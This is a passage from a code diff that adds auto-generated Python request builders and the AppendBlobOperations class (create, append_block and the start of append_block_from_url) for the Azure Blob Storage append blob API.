_url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-blob-type'] = _SERIALIZER.header("blob_type", blob_type, 'str') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if blob_content_type is not None: + _header_parameters['x-ms-blob-content-type'] = _SERIALIZER.header("blob_content_type", blob_content_type, 'str') + if blob_content_encoding is not None: + _header_parameters['x-ms-blob-content-encoding'] = _SERIALIZER.header("blob_content_encoding", blob_content_encoding, 'str') + if blob_content_language is not None: + _header_parameters['x-ms-blob-content-language'] = _SERIALIZER.header("blob_content_language", blob_content_language, 'str') + if blob_content_md5 is not None: + _header_parameters['x-ms-blob-content-md5'] = 
_SERIALIZER.header("blob_content_md5", blob_content_md5, 'bytearray') + if blob_cache_control is not None: + _header_parameters['x-ms-blob-cache-control'] = _SERIALIZER.header("blob_cache_control", blob_cache_control, 'str') + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if blob_content_disposition is not None: + _header_parameters['x-ms-blob-content-disposition'] = _SERIALIZER.header("blob_content_disposition", blob_content_disposition, 'str') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if blob_tags_string is not None: + _header_parameters['x-ms-tags'] = _SERIALIZER.header("blob_tags_string", blob_tags_string, 'str') + if immutability_policy_expiry is not None: + _header_parameters['x-ms-immutability-policy-until-date'] = _SERIALIZER.header("immutability_policy_expiry", immutability_policy_expiry, 'rfc-1123') + if immutability_policy_mode is not None: + _header_parameters['x-ms-immutability-policy-mode'] = _SERIALIZER.header("immutability_policy_mode", immutability_policy_mode, 'str') + if legal_hold is not None: + _header_parameters['x-ms-legal-hold'] = _SERIALIZER.header("legal_hold", legal_hold, 'bool') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_append_block_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "appendblock") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + transactional_content_crc64 = kwargs.pop('transactional_content_crc64', None) # type: Optional[bytearray] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + max_size = kwargs.pop('max_size', None) # type: Optional[int] + append_position = kwargs.pop('append_position', None) # type: Optional[int] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if transactional_content_crc64 is not None: + _header_parameters['x-ms-content-crc64'] = _SERIALIZER.header("transactional_content_crc64", transactional_content_crc64, 'bytearray') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if max_size is not None: + _header_parameters['x-ms-blob-condition-maxsize'] = _SERIALIZER.header("max_size", max_size, 'long') + if append_position is not None: + _header_parameters['x-ms-blob-condition-appendpos'] = _SERIALIZER.header("append_position", append_position, 'long') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", 
encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_append_block_from_url_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "appendblock") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + source_url = kwargs.pop('source_url') # type: str + content_length = kwargs.pop('content_length') # type: int + source_range = kwargs.pop('source_range', None) # type: Optional[str] + source_content_md5 = kwargs.pop('source_content_md5', None) # type: Optional[bytearray] + source_contentcrc64 = kwargs.pop('source_contentcrc64', None) # type: Optional[bytearray] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + transactional_content_md5 = kwargs.pop('transactional_content_md5', None) # type: Optional[bytearray] + encryption_key = kwargs.pop('encryption_key', None) # type: Optional[str] + encryption_key_sha256 = kwargs.pop('encryption_key_sha256', None) # type: Optional[str] + encryption_algorithm = kwargs.pop('encryption_algorithm', None) # type: Optional[Union[str, "_models.EncryptionAlgorithmType"]] + encryption_scope = kwargs.pop('encryption_scope', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + max_size = kwargs.pop('max_size', None) # type: Optional[int] + append_position = kwargs.pop('append_position', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + if_tags = kwargs.pop('if_tags', None) # type: Optional[str] + source_if_modified_since = kwargs.pop('source_if_modified_since', None) # type: Optional[datetime.datetime] + source_if_unmodified_since = kwargs.pop('source_if_unmodified_since', None) # type: Optional[datetime.datetime] + source_if_match = kwargs.pop('source_if_match', None) # type: Optional[str] + source_if_none_match = kwargs.pop('source_if_none_match', None) # type: Optional[str] + 
request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + copy_source_authorization = kwargs.pop('copy_source_authorization', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-copy-source'] = _SERIALIZER.header("source_url", source_url, 'str') + if source_range is not None: + _header_parameters['x-ms-source-range'] = _SERIALIZER.header("source_range", source_range, 'str') + if source_content_md5 is not None: + _header_parameters['x-ms-source-content-md5'] = _SERIALIZER.header("source_content_md5", source_content_md5, 'bytearray') + if source_contentcrc64 is not None: + _header_parameters['x-ms-source-content-crc64'] = _SERIALIZER.header("source_contentcrc64", source_contentcrc64, 'bytearray') + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + if transactional_content_md5 is not None: + _header_parameters['Content-MD5'] = _SERIALIZER.header("transactional_content_md5", transactional_content_md5, 'bytearray') + if encryption_key is not None: + _header_parameters['x-ms-encryption-key'] = _SERIALIZER.header("encryption_key", encryption_key, 'str') + if encryption_key_sha256 is not None: + _header_parameters['x-ms-encryption-key-sha256'] = _SERIALIZER.header("encryption_key_sha256", encryption_key_sha256, 'str') + if encryption_algorithm is not None: + _header_parameters['x-ms-encryption-algorithm'] = _SERIALIZER.header("encryption_algorithm", encryption_algorithm, 'str') + if encryption_scope is not None: + _header_parameters['x-ms-encryption-scope'] = _SERIALIZER.header("encryption_scope", encryption_scope, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if max_size is not None: + _header_parameters['x-ms-blob-condition-maxsize'] = _SERIALIZER.header("max_size", max_size, 'long') + if append_position is not None: + _header_parameters['x-ms-blob-condition-appendpos'] = _SERIALIZER.header("append_position", append_position, 'long') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if if_tags is not None: + _header_parameters['x-ms-if-tags'] = _SERIALIZER.header("if_tags", if_tags, 'str') + if source_if_modified_since is not None: + _header_parameters['x-ms-source-if-modified-since'] = _SERIALIZER.header("source_if_modified_since", source_if_modified_since, 'rfc-1123') + if source_if_unmodified_since is 
not None: + _header_parameters['x-ms-source-if-unmodified-since'] = _SERIALIZER.header("source_if_unmodified_since", source_if_unmodified_since, 'rfc-1123') + if source_if_match is not None: + _header_parameters['x-ms-source-if-match'] = _SERIALIZER.header("source_if_match", source_if_match, 'str') + if source_if_none_match is not None: + _header_parameters['x-ms-source-if-none-match'] = _SERIALIZER.header("source_if_none_match", source_if_none_match, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if copy_source_authorization is not None: + _header_parameters['x-ms-copy-source-authorization'] = _SERIALIZER.header("copy_source_authorization", copy_source_authorization, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_seal_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "seal") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + if_match = kwargs.pop('if_match', None) # type: Optional[str] + if_none_match = kwargs.pop('if_none_match', None) # type: Optional[str] + append_position = kwargs.pop('append_position', None) # type: Optional[int] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}/{blob}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + if if_match is not None: + _header_parameters['If-Match'] = _SERIALIZER.header("if_match", if_match, 'str') + if if_none_match is not None: + _header_parameters['If-None-Match'] = _SERIALIZER.header("if_none_match", if_none_match, 'str') + if append_position is not None: + 
_header_parameters['x-ms-blob-condition-appendpos'] = _SERIALIZER.header("append_position", append_position, 'long') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class AppendBlobOperations(object): + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`append_blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def create( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + request_id_parameter=None, # type: Optional[str] + blob_tags_string=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Create Append Blob operation creates a new append blob. + + :param content_length: The length of the request. + :type content_length: long + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date and time when the blob's immutability + policy is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob.
+ Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "AppendBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "AppendBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_create_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + timeout=timeout, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + 
blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def append_block( # pylint: disable=inconsistent-return-statements + self, + content_length, # type: int + body, # type: IO + timeout=None, # type: Optional[int] + transactional_content_md5=None, # type: Optional[bytearray] + transactional_content_crc64=None, # type: Optional[bytearray] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + append_position_access_conditions=None, # type: Optional["_models.AppendPositionAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) 
-> None + """The Append Block operation commits a new block of data to the end of an existing append blob. + The Append Block operation is permitted only if the blob was created with x-ms-blob-type set to + AppendBlob. Append Block is supported only on version 2015-02-21 or later. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param append_position_access_conditions: Parameter group. Default value is None. + :type append_position_access_conditions: + ~azure.storage.blob.models.AppendPositionAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "appendblock". Note that overriding this default value + may result in unsupported behavior.
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "appendblock") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _max_size = None + _append_position = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if append_position_access_conditions is not None: + _max_size = append_position_access_conditions.max_size + _append_position = append_position_access_conditions.append_position + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_append_block_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + lease_id=_lease_id, + max_size=_max_size, + append_position=_append_position, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.append_block.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', 
response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-append-offset']=self._deserialize('str', response.headers.get('x-ms-blob-append-offset')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + append_block.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def append_block_from_url( # pylint: disable=inconsistent-return-statements + self, + source_url, # type: str + content_length, # type: int + source_range=None, # type: Optional[str] + source_content_md5=None, # type: Optional[bytearray] + source_contentcrc64=None, # type: Optional[bytearray] + timeout=None, # type: Optional[int] + transactional_content_md5=None, # type: Optional[bytearray] + request_id_parameter=None, # type: Optional[str] + copy_source_authorization=None, # type: Optional[str] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + append_position_access_conditions=None, # type: 